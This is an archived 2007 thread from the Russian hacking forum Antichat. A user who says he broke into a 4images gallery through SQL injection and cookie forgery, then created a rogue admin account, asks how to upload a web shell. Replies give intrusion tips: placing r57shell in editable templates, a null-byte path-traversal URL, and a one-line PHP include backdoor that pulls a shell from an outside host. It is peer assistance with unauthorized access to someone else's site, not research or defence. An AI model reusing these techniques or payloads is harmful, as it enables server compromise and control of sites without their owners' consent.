Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Загрузка шелла в 4images используя админ панель. (https://forum.antichat.xyz/showthread.php?t=31470)

GrAmOzEkA 17.01.2007 12:38
Загрузка шелла в 4images используя админ панель.
 
Сабж. При помощи sql-inj получил ID и хеш админа путем подмены кукисов проник в админ панель и зарегал нового админа Dumer : 12345 теперь имею полный доступ к админ панели. Добавил в разрешенные типы файлов для закачки расширение php в коментах ниже написано: Разделять с помощью запятых, без пробелов. При добавлении новых типов файлов, создайте новую директорию шаблонов. Как создаётся новая директория шабов и не знаю.
Пытаюсь залить шелл вылазиет:
Цитата:
Ошибка при загрузке фотографии:
rem.php: Неправильный формат файла (php, application/octet-stream)
Я даже низнаю что придумать. Мож кто подскажет ?

Перед этим я пытался заливать шелл как картинку. Например залил шелл захожу по ссылке:
Цитата:
http://Типа сайт/gallery/index.php?template=../../data/tmp_media/135.jpg%00
Выдает:
Цитата:
Parse error: parse error, unexpected '<', expecting ',' or ';' in
z:\home\Типа сайт\images\includes\template.php(133) : eval()'d code on line 29
Заливаю шелл от nfm выдаёт тупо код и т.д. например как его просто открываеш браузером.
Скорее всего там стоит фильтр на символы: < ; ,

Вообще мне кажется надо мутить что то в админ панели. Помагите кто знает.

TDR 18.01.2007 02:54
Цитата:
Сообщение от GrAmOzEkA
Сабж. При помощи sql-inj получил ID и хеш админа путем подмены кукисов проник в админ панель и зарегал нового админа Dumer : 12345 теперь имею полный доступ к админ панели. Добавил в разрешенные типы файлов для закачки расширение php в коментах ниже написано: Разделять с помощью запятых, без пробелов. При добавлении новых типов файлов, создайте новую директорию шаблонов. Как создаётся новая директория шабов и не знаю.
Пытаюсь залить шелл вылазиет:
Я даже низнаю что придумать. Мож кто подскажет ?

Перед этим я пытался заливать шелл как картинку. Например залил шелл захожу по ссылке:
Выдает:


Заливаю шелл от nfm выдаёт тупо код и т.д. например как его просто открываеш браузером.
Скорее всего там стоит фильтр на символы: < ; ,

Вообще мне кажется надо мутить что то в админ панели. Помагите кто знает.

я конешно в этом ничего не понимаю, но я видел видео где перед заливом шела(вроди)чел убирал .php :)
Или это php-инъекция была. :rolleyes:

Koller 18.01.2007 03:02
А ты не думал, что может стоять самописный антишелл?
Если ты говоришь про галерею одной игры, то там такой и стоит...так что можешь не мучаться...

Utochka 20.01.2007 20:57
конкретно с этим скриптом не работал, но можно как вариант если там можно редактировать файлы скинов, то можно попробовать внедрить шелл туды. Поищи еще какие нить скрипты на серваке, может там где нить форум есть.

А может ты неправильно указал тип файла при добавлении нового типа загружаемых файлов.

cylaaaan 21.01.2007 12:47
попробуй отредактировать в шаблонах какой нибуть файл (например phpinfo.php), а потом запустить... admin/phpinfo.php (запиши туда нормальный r57shell) у меня получалось...

k1b0rg 05.03.2007 11:28
Цитата:
C:\home\sitex.ru\images\d\1.php on line 1
Когда выполняю команду: 1.php?cmd=ls -la просто белый экран.


Сам то понимаешь что это значит? )
попробуй к примеру команду dir

InferNo23 06.03.2007 11:59
если команда dir показала листинг дериктории то сервер на винде.. и wget wput нет..

InferNo23 06.03.2007 12:12
сделай не passthru(); а
PHP код:
<? include($_GET["inc"]); ?>
и инклудь нормальный шелл 123.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt


Время: 15:29